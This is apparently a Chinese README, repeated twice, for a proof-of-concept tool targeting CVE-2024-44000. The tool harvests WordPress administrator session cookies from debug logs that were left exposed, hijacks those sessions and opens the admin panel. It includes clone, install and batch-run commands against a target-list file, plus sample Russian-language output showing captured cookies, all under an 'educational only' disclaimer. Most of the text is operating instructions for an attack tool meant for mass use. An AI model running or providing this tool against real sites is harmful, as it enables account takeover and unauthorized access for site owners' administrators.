GenCookieSessionHijack 是一款 PoC 工具,旨在利用 WordPress 站点不安全暴露的调试日志来提取会话 Cookie。这使攻击者能够劫持活跃的管理员会话,并获得对 WordPress 管理后台的未授权访问。
wordpress_logged_in)。git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
list.txt)。python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file:包含 URL 列表的文件路径(默认:list.txt)。-o, --output:用于保存结果的文件(默认:result.txt)。python GenCookieSessionHijack.py -f targets.txt -o output.txt
这将从 targets.txt 中读取 URL 列表,尝试提取并使用会话 Cookie,并将结果保存到 output.txt。
如果会话劫持尝试成功,该工具将生成一个带有被劫持管理员会话 Cookie 的 URL,并直接在默认浏览器中打开它。
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
本工具仅供教育目的使用,不应被用于非法活动。作者对因使用本工具而造成的任何滥用或损害概不负责。
GenCookieSessionHijack 是一款 PoC 脚本,用于利用 WordPress 站点上不安全暴露的调试日志来提取会话 Cookie。这使攻击者能够拦截管理员的活动会话,并获得对 WordPress 管理面板的未授权访问。
wordpress_logged_in)。git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
list.txt)。python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file:URL 列表文件的路径(默认:list.txt)。-o, --output:用于保存结果的文件(默认:result.txt)。python GenCookieSessionHijack.py -f targets.txt -o output.txt
这将从 targets.txt 中读取 URL 列表,尝试提取并使用会话 Cookie,并将结果保存到 output.txt。
如果会话捕获尝试成功,该工具将生成一个带有被捕获管理员会话 Cookie 的 URL,并直接在浏览器中打开它。
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
本工具仅供教育目的使用,不应被用于非法活动。作者对因使用本工具而造成的任何滥用或损害概不负责。